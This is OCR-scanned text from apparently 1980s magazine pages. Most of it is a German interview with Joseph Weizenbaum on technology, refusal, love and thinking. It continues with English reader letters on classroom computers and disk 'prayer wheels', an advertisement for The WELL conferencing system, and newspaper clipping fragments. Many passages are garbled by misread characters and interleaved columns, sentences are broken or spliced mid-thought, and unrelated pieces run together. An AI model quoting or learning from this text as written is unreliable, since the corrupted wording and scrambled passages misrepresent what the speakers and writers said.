Indianer vergessen haben. Das ist typisch ameri¬
kanisch. Man spricht über die Indianer, wefl es
sie ja nun einmal gegeben hat — und kehrt zur
Tagesordnung zurück und zum Computer. Und
noch etwas soll nicht vergessen werden: Der eben
angesprochene Freilieitsdrang, der den amerika¬
nischen Pionieren nachgesagt wird, ist eine Folge
der Unterdrückungen, die die Menschen in Euro¬
pa erleben mußten. Man darf das nicht idealisie¬
ren oder romantisieren.
Leo Domzalski: Wenige gingen nach Amerika
um eine bessere Welt zu schaffen, die meisten mit
der Hoffnung, für sich ein besseres Leben zu
haben,
Joseph Weizenbaum: Ein Beispiel sind die Iren-
Damals herrschte eine Hungersnot in Irland Die
hatten einfach Hunger!
Wenn man das mit unserer heutigen Situation
vergleicht, muß man feststellen, daß die Situation
Westberlins geradezu symbolisch ist für unsere
Situation überhaupt: Unsere Gesellschaft ist um
ringt von einer Mauer. Man kann heute nirht
mehr “Weggehen”, auch von Amerika nicht Fs
gjbt das “andere ” Land nicht mehr. ' “
Chaos und Abstraktion
Markus Schmidt: Wenn man das jetzt noch ein
mal für die amerikanische Gesellschaft betr h”
tet: Ist es nicht so, daß diese unsichtbare M
von der Sie sprechen, in den USA auch
sammenhängt, daß die 2üvllisatlon dort ent t
den ist einerseits durch den Ausbruch au«
Traditionen der Alten Welt und andere •
durch die Verdrängung der ursprünglichen
nischen Kultur, daß die amerikanische Ki*'
also gewissermaßen wurzellos schwebt?
Joseph Weizenbaum: Von dieser Verdrängung
herrscht aber überhaupt kein Bewußtsein. Die
Antwort, die man bekommen würde; Es war
doch nichts da! Als ich 1936 nach Amerika kam,
kannte ich keine Unterdrückung der Schwarzen,
weil ich die Schwarzen überhaupt nicht wahr-
nahm. Sie waren für mich einfach nicht-da. Das
ist ein Trick, den der Mensch nur zu gut be¬
herrscht: Zu verdrängen, was er rucht sehen will.
Die Pioniere, die 1850 in den Westen zogen,
hatten diese Fähigkeit, die Indianer — außer in
den Visieren ihrer Gewehre — zu ignorieren, in
ungeheuer starkem Maße ausgebildet. Und diese
Menschen fielen keineswegs vom Himmel: Sie
kamen eben aus Europa.
Leo Domzalski: Damit ist ein bestimmtes Ver¬
hältnis zur Natur gekennzeichnet: Die Indianer
wurden als Naturvolk angesehen und die Natur,
die Wildnis, mußte besiegt werden, Die Folge ist,
daß die Indianer vertrieben und schlichtweg aus¬
gerottet wurden.
Markus Schmidt: Ich sehe hier doch eine ziem¬
lich direkte Linie zur Entstehung des Computers.
Dieser Drang danach, die “Wildnis”, die man als
Chaos empfand, durch die Ratio zu ordnen und
zu beherrschen, den natürlichen Strukturen das
Merkmal logischer Abstraktion aufzuprägen —
bildet diese innere Haltung nicht den Boden für
solche Entwicklungen, die schließlich auch den
Computer hervorbringen?
Adrian Domzalski: Könnte man sagen: Wir — als
Europäer — haben das, was Amerika geworden
ist, gewissermaßen aus uns herausgesetzt und ver¬
drängt?
Joseph Weizenbaum: Ich glaube, es ist eigentlich
eine viel allgemeinere Frage, um die es hier geht.
Es ist die Frage, wo überhaupt Erfindungen her-
kommen. Es geschieht viel zu schnell, daß man
der Wissenschaft eine Autonomie zuspricht, die
eigentlich gar nicht existiert. Insbesondere wäh-
. rend der faiegszeit gab es durchaus Notwendig¬
keiten. Trajektoren von Geschoßbahnen mußten
berechnet werden, es stellten sich die gewaltigen
Aufgaben der Logistik, Nachschubversorgung,
Rüstungsproduktion, Treibstoffversorgung mu߬
ten organisiert werden. Da gab es wirtschaftliche
Notwendigkeiten, und es gab eine Reihe von
technischen Möglichkeiten; Daraus entstand der
Computer. Von einer Autonomie der Wissen¬
schaft zu sprechen, wäre hier Unsinn. Und es war
auch durchaus kein Zufall, daß der Computer in
den USA, Großbritannien und Deutschland
gleichzeitig entwickelt wurde. Es war eben nur
Konrad Zuses Pech, daß die Hjtler-Regierung
nicht erkannte, was er da in den Händen hatte.
Ein anderes Beispiel ist Robert McNamara, der
Verteidigungs- (iso eigentlich Kriegs-)minister
unter John F. Kennedy und Johnson - also wäh¬
rend des Vietnamkrieges. Er war ein Kind dieser
systematischen Kriegsfühmng. Schon im Zweiten
Weltkrieg war er einer der allerersten, die die
Logistik der Luftwaffe mit den, damals noch sehr
anfänglichen, Computermethoden bearbeitet
haben.
Von einer autonomen oder freien Erfindung
kann hier nicht die Rede sein: Es gab einige sehr
spezielle Aufgaben, die gelöst werden mußten. So
entstanden die Vorläufer des Computers.
Verweigerung
Markus Schmidt: In Ihren Büchern, insbesondere
in “Kurs auf den Eisberg” kommen Sie bei der
Frage nach der Lösung der gegenwärtigen Um¬
welt- und Technologiekrisen immer wieder auf
die Verweigerung zu sprechen. Mir ist nun die
Frage: Aus weichet Motivation kommt man zu
einer vernünftigen Verweigerung, die die Technik
in ihre Schranken weist: Bis hierher und nicht
weiter? Und aus welcher Motivation kann viel¬
leicht auch wiedereingegliedert werden, was jahr¬
hundertelang verdrängt wurde? Und; Genügt es
zu verweigern oder braucht man für die Bildung
einer positiven Zukunftsentwicklung noch etwas
anderes?
Joseph Weizenbaum: Um verantwortlich handeln
zu können, muß man Zeit haben, äch sein zu¬
künftiges Verhalten zu überlegen. Wenn diese
Zeit nicht gewährt wird, dann bleibt einem oft
nichts anderes übrig, als sich zu verweigern. Die
Entwicklungen gehen zu schnell: Man hat nicht
die Zeit, sich gründlich genug zu überlegen: Für
diesen Zweck sollen die Eisenbahn oder der KUld-
schrank oder der Computer nicht angewendet
werden. Man kommt schließlich an einen Punkt,
wo man nur noch sagen kann; “Aulhören! Slop!
1 want to get off! Ich brauche Zeit!"
Die Versuchung, ohne genügende Zeit auszukom¬
men, also nur noch Sachzwängen zu folgen, ist
gewitig. Die Verweigerung sehe ich als eine Art
Notruf. Nicht, daß ich mich grundsätzlich ver¬
weigern wollte. Ich kann aber mein eigenes Ver¬
halten nicht verantworten, ohne nachzudenken.
Ich muß aufhören, um nachdenken zu können:
Eine Stunde, einen Tag oder ein Jahr. Und in¬
zwischen geht die Welt weiter.
Manchmal scheint es mir fast, als ob es gar kein
Aufhören geben könnte.
Dorothea Domzaiskk Ich denke, es kann immer
nur ein individuelles Aufhören sein. Und das ist
ja dann auch durchaus etwas Aktives. Damit ver¬
bunden kann ja der Wunsch sein, als Mensch ein
sozialeres Leben zu fuhren, wenn man sieht, in
welche Isolation der Fernseher oder der Compu¬
ter führen. Insofern ist es doch von Nutzen, auf
diese Drogen zu verzichten.
Joseph Weizenbaum: Mir fallt immer wieder auf,
daß gerade die Kinder heute schon viel zu oft vor
Entscheidungen gestellt werden, ohne wirkEch
die Tjt H zu haben, sich darauf vorzubereiten, sich
zu überlegen, was sie eigentlich wollen. Aus die¬
ser Not ist der einzige Ausweg oft die Verweige¬
rung - einfach aus dem Zeitdruck heraus, in dem
wir leben. Die Zeit fehlt in unserer Welt, sich vor¬
zubereiten, gerade für die Heranwachsenden.
Dabei haben wir doch nichts anderes als Zeit.
Wir leben in der Zeit. Aber dann kommen die
sogenannten Sachzwänge. Was da zwingt, sind
viel weniger die Sachen als man selber, indem
man sich gezwungen fühlt.
Und dann kommt die riesige Versuchung, wenn
man ein Talent hat, zum Beispiel für Mathematik,
dieser Begabung einfach nachzugehen, ohne die
Zeit zu haben, darüber nachzudenken: Was
macht denn die Muthemulik in unserer Welt
eigentlich?
Markus Schmidt: Bei der Frage nach der Verwei¬
gerung muß ich an die Situation der ökologischen
Bewegung in der Bundesrepublik denken: Sie ist
hervorgegangen aus der Protestbewegung und
steht nun vor der Frage: Was wollen wir eigent¬
lich über den Protest hinaus? Bei den Grünen
plant man inzwischen einen Stratepekongreß, in
dem diese Frage im Vordergrund stehen soll. -
Werm es nun gelingt, sich selbst die Zeit zu neh¬
men, die man braucht, um zu entscheiden: Was
will ich eigentlich? — was macht man mit diesem
Freiraum?
Joseph Wehenbaum: Dann hat man es geschafft.
Markus Schmidt: Damit allein schon?
Joseph Weizenbaum: Möglicherweise. Das, was
sich bei den Grünen abspielt, daß sie wissen müs¬
sen, was sie tatsächlich wollen, das ist ja auch die
Aufgabe des Einzelnen. Und das ist eine sehr
schwierige Aufgabe in dieser Welt,
Ich habe eine interessante Erfahrung gemacht mit
meinen vier Kindern; Ungefähr im gleichen Alter
kamen sie zu mir, um sich in bestimmten Lebens¬
situationen Rat zu holen. Und ich habe schlie߬
lich allen den gleichen Rat gegeben, ganz ein¬
fache Hinweise - aber nicht, weil ich ihn schon
vorher gewußt hätte: Er hat sich jeweils neu aus
jeder der einzelnen Situationen entwickelt.
Worauf ich damit hinweisen will: Es kommt gar
nicht so sehr darauf an, was im einzelnen für ein
Resultat entsteht. Viel wichtiger ist es, wie man
dahin kommt. Der Weg ist das Ziel.
Letztes Jahr sprach ich auf einer Podiumsdiskus¬
sion hier in Berlin von dem Kern aller großen
Religionen in der Welt; Christentum, Buddhis¬
mus, Islam. Sie haben aUe etwas gemeinsam; die
Liebe.
Damals hat mir jemand aus dem Publikum das
Brecht-Zitat entgegengehalten “Erst kommt das
Fressen, dann kommt die Moral”. Er hatte recht:
Es geht nicht nur um Liebe, es ist Brot und Liebe,
was notwendig ist. Es ist für uns, die wir hier in
einem schönen Haus bei Kaffee und Kuchen zu¬
sammensitzen, seht einfach: Wir können uns die
Zeit nehmen. Das können wir aber nur, weil wir
das “Fressen” schon haben. Eine große Mehrheit
der Menschheit hat diese Zeit nicht, weil sie das
Brot nicht hat. Das darf nicht vergessen werden.
Markus Schmidt: Wenn Sie Liebe als den Kem
der Religionen bezeichnen: Können Sie noch
etwas genauer sagen, was Sie darunter verstehen?
Joseph Weizenbaum: Nein.
Markus Schmidt: Man kann also kein Pauschal¬
rezept geben für die Liebe. Sie ist jeweils indivi¬
duell . . .
Liebloses Denken
Joseph Weizenbaum: Das stimmt auch nicht. Die
Welt ist kein Computer, sie ist nicht binär auf-
gebaut. Es ist nicht so, daß man es entweder pau¬
schal sagen kann oder daß es nur vom Einzelnen
abhängt. Es gibt hier kein “entweder — oder”!
Liebe ist eine solche umfassende Idee, sie ist so
tiefgehend ... — wie könnte man sie in einem
Satz oder auch in einem Buch oder selbst in einer
Bücherreihe zum Ausdmck bringen? Und selbst
die Symphonien, die man in einem ganzen Leben
schreibt, wenn man Beethoven heißt - eine end¬
gültige Definition werden auch sie nicht liefern.
Obwohl man als Künstler vielleicht am ehesten
etwas davon zum Ausdruck bringen kann.
Definieren kann ich die Liebe jedenfalls nicht.
Bedeutet das dann, daß ich keine Liebe erfahre?
Ich kann nur sagen: Ich erfahre sie in diesem
Augenblick. Und wer dazu etwas wissen will, der
muß mit mir leben. Sagen kann ich es nicht.
Oliver Thomas Domzakki: Ebenso könnte viel-
ieicht ein Musiker nicht sagen, was Musik ist.
Joseph Weizenbaum: Ich muß in diesem Zusam¬
menhang oft an die Delphine denken, die ja ein
ebenso großes und entwickeltes Gehirn haben
wie der Mensch. Ich frage mich, ob sie überhaupt
einen Begriff von “Wasser” haben.
Markus Schmidt: Aber vielleicht kann man doch
auch mit begrifflichen Hilfsmitteln noch etwas
näher herankommen. Wir haben vorhin über die
Armen und die Reichen, die Amerikaner und die
Europäer gesprochen. Das heißt, wie haben
abstrakte Begriffe gebildet, die wir über die Reali¬
tät stülpen. In gewisser Weise (insbesondere,
wenn es um soziale Tatsachen geht) ist das doch
ein liebloses Denken. Vielleicht könnte das eine
Annäherung sein: Daß man im konkreten einzel¬
nen Fall das jeweils Richtige zu tun imstande ist.
Die Frage ist dann allerdings: Was ist das jeweils
Richtige und wie kommt man dazu? Ganz be¬
stimmt ist es jedenfalls nicht notwendig, es in
irgendeiner abstrakten Sprache auszudrücken.
Adrian Domzalski: Ich glaube, man muß hier Be¬
griff und Verständnis auseinanderhalten. Einen
Begriff von Liebe braucht man nicht, genauso¬
wenig wie es sinnvoll ist - normalerweise jeden¬
falls — einen Begriff von den Körperfunktionen
zu haben: Wenn ich zu genau darüber nachdächte,
wie und warum mein Herz schlägt, hätte ich
Angst, daß es aufhört zu schlagen.
Joseph Weizenbaum: Auch das Beispiel der Mu¬
sik kann hier sicherlich weiterhelfen. Man kann
sehr wohl wissen, was Musik ist, man kann sogar
gute und schlechte Musik unterscheiden, ohne sie
begrifflich zu definieren. Das gleiche gilt übrigens
auch für die Intelligenz. Über all das - Musik,
Liebe, Intelligenz - kann man durchaus spre¬
chen, man kann es sogar verstehen, auch ohne
Definitionen. Man muß es erlebt, gelebt haben.
Sonst weiß man gar nichts, selbst wenn man alle
Bücher gelesen hätte, die es dazu gibt.
Markus Schmidt: Wie schützt man sich dann aber
vor Illusionen? Es geschieht doch sehr leicht, daß
man meint, man sei ein liebevoller oder auch ge¬
rechter Mensch, während im Grunde damit oft
nur Selbstliebe und Selbstgerechtigkeit bemäntelt
werden.
Dorothea Domzalski: Aber schützen davor be¬
griffliche Definitionen?
Joseph Weizenbaum: Die Unterscheidungsfähig-
keit, durch die man sich vor Illusionen schützt,
findet man meistens erst im Nachhinein. Im
aktuellen Augenblick hat man sie meistens noch
nicht. Wie oft habe ich z.B. gemeint, den “Mac¬
beth” von Shakespeare verstanden zu haben. Und
jedesmal, wenn ich ihn wieder einmal sehe, denke
ich: Nein, bisher habe ich ihn nicht verstanden,
aber jetzt verstehe ich ihn! Schließlich, wenn
man etwas älter wird, stellt man fest: Das Ver¬
ständnis gibt es gar nicht. Es ist immer eine Ent¬
wicklung. Wieder einmal: Der Weg ist das Ziel.
Adrian Domzalski: Die Frage nach der Illusion
kann man ja durchaus auch an die Wissenschaft
und Technik stellen. Gerade dadurch, daß man
sich abstrakte Begriffe bildet, entsteht die Illu¬
sion, man könnte alles das auch beherrschen, was
man definiert hat. So glaubt man z.B. nicht
mehr, ein Gewitter bedeute den Zorn der Götter
- stattdessen hat man Begriffe davon, wie das
Wetter funktioniert und meint nun, auch selbst
in die Wettervorgänge eingreifen zu können.
Joseph Weizenbaum: Ein sehr gutes Beispiel! Ich
werde oft gefragt: Was erwartet uns? Wie wird
sich die Computertechnologie entwickeln? Und
ich werde in der gleichen Haltung gefragt, wie
man einen Meteorologen nach dem Wetter von
morgen fragt! Man glaubt an eine Entwicklung,
die mit uns als Menschen nichts zu tun hat, die
sich - wie das Wetter — unabhängig von uns voli-
zieht. Wieder einmal das Märchen von der auto¬
nomen Entwicklung von Wissenschaft und Tech¬
nik: Ohne jeden Bezug zum Menschen und zu ge¬
sellschaftlichen Zusammenhängen. Das stimmt
aber nicht!
Bescheidenheit
Markus Schmidt: Ich möchte doch noch einmal
auf das Denken zurückkommen, weil ich den Ein¬
druck habe, daß es sehr schlecht weggekommen
ist. Und ich bin mir nicht sicher, ob man wirklich
ehrlich ist, wenn man die Fähigkeit des Denkens
als unwesentlich beiseiteschiebt und sich auf die
spontane Intuition in der jeweiligen Situation
verläßt. Oder anders gefragt: Gibt es nicht doch
eine Möglichkeit, das Denken so weiterzuentwik-
keln, daß es Positives erzeugt? Daß das Denken
Schädliches hervorgebracht hat — eine Zivilisa¬
tion, die die Natur zerstört, eine Rüstungsmaschi¬
nerie rrtit Overkill-Kapazitäten —, das stimmt
natürlich alles. Aber kann die einzige Konsequenz
davon sein, mit dem Denken aufzuhören und sich
auf das Gefühl zutückzuziehen?
Leo Domzalski: Im Deutschen gibt es den Be¬
griff “Denker”. Damit meint man Menschen, die
wirklich nachdenken über die Welt, das Leben
Das ist doch eine andere Art von Denken als die
welche man durch die künstliche Intellieenz
nachzuahmen versucht. Und ich meine, diese Art
von Denken ist nicht inflationär, sondern . . . _
Markus Schmidt: ... vom Aussterben bedroht!
Joseph Weizenbaum: Ja, aber dann gerade von
der Seite des Positivismus und der Comoutertech
nologie! Es ist ganz klar, wo ich in dieser Fraä"
stehe: Diese Art von Denken genügt nicht.
der anderen Seite verkenne ich aber auch nicht
daß es notwendig ist. Wir müssen rechnen, und
zwar nicht nur mit Zahlen. Das ist notwe’ndie
aber es reicht nicht aus.
Markus Schmidt: Ich bitte um Entschuldigune
wenn meine Frage jetzt wieder “binär” klüirt’
Meines Erachtens zeichnet sich hier aber doch
eine sehr deutliche Polarität ab: auf der einen
Seite der rein operationalistische Verstand der
immer zu einem bestimmten, definierbaren
Zweck führen wiU. Dieser läßt sich durch de
Computer scheinbar vom Menschen loslösen Mh
ergibt sich daraus das Folgende: Der Mensch hat
etwas aus sich herausgesetzt und ist gerade im
sten Begriffe, die Gewalt darüber zu verlieren"
Ein komplexes Computerprogramm ist für d”'
einzelnen Verstand nicht mehr denkend nächst*'
vollziehen. - Frage: Was muß dem auf der an^'
ren Seite entgegengesetzt werden?
Joseph Weizenbaum: Bescheidenheit!
Markus Schmidt: Bescheidenheit?
Notwendigkeit, Zeit zu lassen. Warum ET*?
Warum muß jeder wissenschaftliche Fortscwi
sofort m Technologie umgesetzt werden? tfj
dann sofort vermarktet werden?
I
Adrian Domzalski: Mir ist allerdings die Frage,
ob das Denken heute so sehr der Verteidigung be¬
darf. Das rationale Denken zu verteidigen,
scheint mir so zu sein, als wenn jemand in eine
ObdachJosenküche ginge und sagte: Leute, über-
freßt euch nicht! Das Denken scheint mir nicht
ger.ade vom Aussterben bedroht zu sein.
Markus Schmidt: Doch, es ist vom Aussterben
bedroht - und zwar gerade auch in der Compu¬
tertechnologie. Da hat man scheuibar einen Be¬
reich, wo einem das Denken abgenommen wird,
was natürlich in Wirklichkeit nicht der Fall ist.
Man meint aber, man könne Entscheidungs¬
prozesse an eine Maschinerie übergeben.
Was kann man tun? Man muß die WpH
überzeugen, daß wir solche Eile nir-K»
haben. Wir brauchen Zeit, um uns zu besinn”'^^®
als Einzelner und als Gesellschaft Sv®” ~
gibt es die drei ersten Hauptgesetze der
Sicherheit. Das erste ist: die FluBßeschwt„j- . 8'
beibehalten, das zweite ist: die FluEEeschil-®*^®’'
keit beibehalten, und das dritte ist- die
schwindigkeit beibehalten. Dann erst kn
alle anderen Gesetze der Flugsicherheit.
So ist es auch mit uns. Wir haben uns
det - allerdings nicht bewußt: Wenn
Fluggeschwindigkeit nicht beibehalten
wir ab. ’
eingebü-
wir die
Stürzen
Ich habe nun noch eine Frage an Sie persönlich,
Professor Weizenbaum: Sie stehen in einem Lehr¬
beruf, in dem Sie fortwährend mit Studenten
umgehen, die im Bereich der Informatik unter¬
richtet werden. Daneben aber vertreten Sie eine
Haltung, die besagt: Worauf es wirklich ankommt,
ist etwas grundsätzlich anderes. Gibt es für Sie
Verbindungen zwischen diesen beiden Ebenen
oder laufen sie gewisseimaßen parallel?
Joseph Weizenbaum: Ich muß es noch einmal be¬
tonen, daß ich nicht glaube, daß sich die Wirk¬
lichkeit durch ein binäres “entweder — oder” er¬
klären läßt. Ich habe auch nicht den Eindruck,
daß das Denken in irgendeiner Weise verachtet
würde. Gerade die Informatiker sind überzeugt
davon, daß das Denken — und nur das Denken -
uns retten kann. So zum Beispiel Prof. Marvin
Minksk, der ganz tief glaubt, daß alles, was wir
Emotionen und Gefühle nennen, letztlich auf
rationale Strukturen zurückzuführen ist, und daß
diese daher auch von Computern bearbeitet und
simuliert werden können. Viele Kollegen sind
davon überzeugt, daß es letzten Endes nichts an¬
deres gibt als das Denken.
Markus Schmidt: Sie sprechen jetzt von der
Ratio. Das meine ich mit “Denken” nicht unbe¬
dingt.
du, wenn du jetzt nicht irgendwo hineeh!?
we^ du jetzt mellt telefonierst - was fürrih. ’
du? Und wenii man das wirklich hinterSa«
wurde schheßhch herauskommen' Es ist ^
nichts zu fürchten. Hier ist wirklich eine
ung notwendig. “=iret-
Dorothea Domzalski: Mich würde nun nocR ■
teressieren, wieviele Menschen in den Sta
diese Art von Technikkritik und Kritik aii
Medien empfinden oder aussprechen wie Du
Deine Freunde. Und darüber hinaus: Gibt^”'*
Menschen, die etwas dagegen tun, weil sie h
S chaden erkennen? Inwieweit können sie ^ ®
der sein? ''Orbü-
Joseph Weizenbaum: Das sind etwa die gleicVi
Leute, die sich auch für den Frieden einset? ***
Das Bewußtsein, welche Schäden die Medien
die Gesellschaft bewirken, ist dasselbe Bcwl «
sein, das einen über den Weltfrieden nachder^”*'
läßt und über solche irrationalen Erscheinun
wie den Bolschewistenhaß in den USA.
Ich habe gerade zum erstenmal in meinen) Leb
zwei Wochen in der Sowjetunion verbracht
war tief beeindruckt von der FreundUchkeit'n'^
dem Entgegenkommen der Menschen dort. Ein
Freund aus Ostberlin dagegen hat es einmal er¬
lebt, daß ihn in Washington jemand ansprach und
ihm direkt ins Gesicht sagte: Im Vietnamkrieg
habe ich meinen Teil an Kommunisten erschos¬
sen, und ich wäre bereit, jeden Tag einen Kom¬
munisten zu erschießen. Ich bin mir ziemlich
sicher, daß etwas Entsprechendes in der Sovsjet-
union unmö^ch wäre,
Markus Schmidt: Eine letzte Frage: Sie halten
jetzt gleich einen Vortrag im Zusammenhang der
Anthroposophischen Gesellschaft. Hat die An¬
throposophie oder hat Rudolf Steiner für Sie eine
persönliche Bedeutung oder bedeuten Ihnen die
Ideen etwas, die von der Anthroposophie ausge¬
hen?
Joseph Weizenbaum: Ich habe einmal in Tübin¬
gen einen Vortrag gehalten mit anschließender
EHskussion. Da fragte dann jemand, ob ich als
Phüosoph ausgebUdet sei. Ich verneinte das, wo¬
rauf mich jener Mann darauf hinwies, ich hätte
eben etwas Ähnliches wie Kant ausgesprochen.
Meine Antwort war: Ich nehme an, daß Kant sich
gefreut hätte, daß ich — obwohl ich kein Philo¬
soph bin — auf dieselbe Sache von einer anderen
Seite komme. Das hat mit meinem Verhältnis
zur Anthroposophie zu tun. Ich treffe immer
wieder Menschen, zu denen ich sofort eine Ver¬
bindung empfinde. Und dann — oft viel später —
stellt sich heraus, daß Kinder dieser Menschen
auf einer Waldorfschule sind oder sie selbst Wal¬
dorfschüler oder Anthroposophen sind. Diese
Erfahrung begegnet mir immer wieder. Ich muß
mir die Menschen gar nicht danach aussuchen,
ob sie Anthroposophen oder Waldorfschüler sind.
Und ich bin auch nicht sonderlich bewandert in
der anthroposophischen Literatur. Bis vor kur¬
zem konnte ich das Wort “Anthroposophie”
kaum aussprechen.
Fishwagons
and smart>aiecs
Maybe you've seen it: a TV commer-
cial for a new Computer System to
teach young kids basic skills. The ad
shows cute little girl listening to volce
Synthesizer ask, "Can a fish ride in a
Wagon?" The Computer screen she is
watching shows a srhiling fish sitting
in a waigon.
Cut to girl's face. She says, “No.”
giggles, and presses appropriate but-
con. The right answer.
A Wide shot shows the kids filing out
of the classroom. with voice-over ex-
plaining that kids in this pilot program
scored high in Important Standard-
ized Tests.
Something about it bugged me. I
broughc Up the question to my in-
house Child Oevelopmental Curricula
Evaluator: niece Hannah, age 8. “Can
a fish ride in a wagon?”
"Yes," she says. “If it had water in it.
Or if It was a fish-selling wagon. But
the answer would be no."
Hannah returns to card game — co-
incidentally, Go Fish — while uncle
tediously embellishes child’s succinct
wisdom.
Hannah knew the answers (emphasis
on che plural!)/buc more revealing
was that she knew “the answer
play the game get into trouble. I can’t
vouch for the truth of this story I
heard several years ago, but I am
sure similar things happen in class-
rooms daily;
A dass had been studying how air
pressure decreases with altitude. A
test question asked them how a
barometer could be used to measure
the height of a tall building.
All the kids dutifully scribbied out the
single, predictable answer, except
one. He wrote: “There are cwo
ways. First, you could drop the
barometer from the top of the build¬
ing and time how long it takes to fall.
You can find the height with the
equation y = lA at where y.equals
distance dropped, a is the acceleration
constant (gravitational acceleration is
about 9.8 meters per second) and t
is the time.
“Second. you could go to the owner
of the building and say, “Here, ril give
you this neat barometer if you’ll teil
me how tall your building is."
At last report. the chlld was in trou¬
ble with some of his teachers. who
labeied him a “smart alec."
Well, nobody will mistake Hannah for
a smart alec. When her school cuts
teachers' salaries to buy Computers,
and the machine asks her about fish
locomotion,.she'll know enough to
punch the correct, narrow, bonehead
answer that satlsfies stupid, channeled
Es ist schön zu erfahren, daß man sich aus ganz
verschiedenen Richtungen auf demselben Boden
treffen kann.
- Markus Schmidt
o
would be no." At eight. she can
play the game.
Not surprising, really. Kids who don’t
cireuitry. And the practice she gains
will indeed help her do well on Impor¬
tant Standardiied Tests, which are as
stupid as Computers, though cheaper.
^ n Ihe phllosophy of Dlgitizing. Basicalty.rmaMedievdistatheart,
harkening to a time when artists and wr'rters freel"/ exchanged
ideas and Images. If somebody eise did a really neat Adam and Eve, why
botherto inventanotherpose if you likedthat one? Atthattimewe hadn'tyet ^
gotten so spun out on ‘originality.' The point wasto get the message out, Use
whatever material is appropriate. Artists & writers viewed themselves less as
originators than as transmitters of material; as such were less attached to their worlo.
(Curiousty this is almost exactly the ethic of the early hackers who started this whole
thing: a fervent belief in the free exchange of all their discoveries.)
Anyway, 1 think the pixelated image that Mac digitizing captures is only a shadow
of the original—the idea of the thing, rather than the
thing itself. Digitizing captures an idea. And when you
finish playing around with it, what you have (if it's still
recognizable) is an homage rather than a rip>-off.
ln keeping with this, let me go on record as saying
anyone who wlshes to digitize any of the Images in this
bookisweicometodoso. May
a hundred flowers bloom!
What'sremarkable to me is that she
can still come up with the right
answers at all . . . but then, she is
only in third grade. Thirteen years of
computer-aided only-one-correct-
answer testing will probably effectively
blur the line for her between what's
right and what's expected.
The trend toward Computers in the
classroom — and, for that matter,
Computers in the real worid — is a
wonderful thing when humans pose
the questions and Computers find the
answers, for the combination of human
creativity and a computer's tireless,
plodding research is potent.
But do it che other way around and
we’ll only rid the worid of smart-
alecs. In that case, good luck to us all.
Brad Lemley
Washington, D.C.
Hard disk prayers _
I was just reading a travel article on
Tibet where this American business-
man calculates that a pilgrim giving
each of the 108 prayer wheels in
Lhasa's Jokhang Monastery a turn as
he or she circles around the exterior
walls recites "Om Mani Padme Om"
16 billion times in one Circuit as long
as the turn possesses sufficient force
to leave the wheel revolving ten times.
While I don’t as yet have a TV, I am
trying to get on this Computer band-
wagon with you guys, like those yurts,
funny food, clothes, books etc. when
I was younger. So anyway, I realiaed
that a hard or floppy disk would make
an excellent prayerwheel, enabling a
user to enter an untold amount of
prayer Information and spin it very
quickly, with ability to alter, monitor,
and tabulate prayers as the Situation
or times dictated. I think adding a lictle
prayer somewhere in your roucine
programs mighc help too, as it would
spin around with the rest of the data
and surely have a good effect.
John Benecki
Inchelium, Washington
^»"WELL
• A Computer conferencing System
• A place to get Information
• Revolutionary low price
* An online meetingplace
Whole Earth Lccironic Link
27 Gaie Five Road
Sausaliio, CA 94965
Modem: 415/332-6106
Voice: 415/332-4335
It’s simple to join:
Have your computcr/modcm dial
415/332*6106
When the WELL responds with its login:
prompt, type
and follow the tnstructlons.
Unlnei Is
TELENET
New # Is:
800/336-0437
fiew iDgln:
<ci> <:cr>
Terminal • dl
& c well
Public Conferences and youii g« to the
, , . ncccss tn n unitiiic cürTimunity of pcoplc
, , , more than 80 Conferences on all nspccts of Computers
. . , join in discussions on a widc ränge of lopics
. , . fjet top qualiry ccchnicnl ndvice from experts
, , , learn tiie UNIX sysrem online
. , , tnlk wich Software devclopers
. . , discuss politics, religion, environment, parenring, sports, music, cducarion
Private Conferences
Any busincss, non-prufir Organization or private gruup can have a private confcrencc;
, . . instant communicarion
. . . formulatc policy online for immediate action
. . . vcrsatilc and powcrful. ready when you arc
Electronic mail and online conversation
. . . the end of “Telephone Tag”
. . . f;end private messages to one person or several
... all messages can bc stored for future refcrcnce
Login with any computer/modem combination
. . . transfer text fiies between incompatiblc Computers
. . . inexpensive Inptops can have the full power of a UNIX machine
Now the WELL
is on UNINET
The WELL can bc rcached from anywhere in
the US. or around the worlJ via Uninct,
reducing the access charges for long distance
dramatically, espccially during off-peak hours.
Tb rcach us via Uninct, cal! 800/821-5340
for the numher closc.st to you. Then dinl that
number, type IcrJ.(cT| (return/period/return)
and when prompted for “service," type
welllcr]
and yovi’ll get to the WELL's login: prompt.
Welcome!
You are now logged in lo Ihe WELL.
PicoSpan T2.5; designed by Marcus Watls
Copyright 1984 NETl; all rights reserved
OK (? orsum for help): mail
Mailversion2.18 5/19/03. Type ?forhelp.
7usr/spool/mail/br’: 3 messages 3 new
>N Imme WedJulySl 13:13 13/364 ’Reteachpr-
N 2ar1 WedJuly31 13:56 12/258 "Re-teacher-
I N 3 gart Wed July31 16:07 13/495 "Re: dinner"
The WELL llsts all your walting messages
each Urne you check In.
CO
vy 4A
What can The WELL
do for you?
• Cut mail costs
• Save travel time and expense
• Reduce pnperwork
• Improve Communications with associates
• Fester cooperative werk from different
lücations
• Keep records of all your transactions
• Technical support and user groups for mos
populär Computers
• Put you in touch with a wide variety
of people
• Cut across time zones
« Rcduce time constrainrs — people can
respond at their convcnience
• Help avoid “Telephone Tag”
Who needs The WELL?
Writers
Hackers
Businesses
Movie*goers
Salcspcople
Professionals
Photographers
Non-profit organizations
THE NEW YORK TIMES, SUNDAY, NOVEMBER 23, 1986
Tracking a Rock Group By Computer
„Chaos Computer Club": In Israel eingepflanzte Viren
könnten weltweit MS-DOS-BetrIebssysteme angreifen
Keine Geheimnisse mehr
Zum Einbruch In den NASA*Computer
I
4<HUSED to use a Roladex and
lunch hours for networking,"
said Lisa Carlson, a Com¬
puter Consultant at Ihe Metasys¬
tems Design Group, a Consulting
firm In Arlington, Va. Now, she
simply punches a few numbers
onto a keyboard to reach Profes¬
sional colleagues. "Wlth electronic
networking, you're not limited to
five lunches a week," she said.
“You can maintaln relatlon; wlth
hundreds of people all over the
World."
Thb wldesp^ead use of personal
.Computers and modems has meant
that ß growihg number of individu-
als iire uslng; technology kther
than legwork to comtnunicate.
They are Incrdaslngly siibscribing
to electronic bulletin boards that
enatle them td “post” Information
and nes^ageslfor others to call up
at will. '
Orte of the Ihrgest such blilletln
boar;ds aroun(|, the Electronic In¬
formation Exchange System oper-
ated out of the| Computerizeä Con-
ferencing Center of the New Jer¬
sey Institute of Technology, has
morp than 2,000 subscribers from
private Companies such as Exxon
and;l.B.M., Government agencles
inclilding NASA, and various Col¬
leges Includin^ IHarvard. Particl-
pants get tojltake "electronic
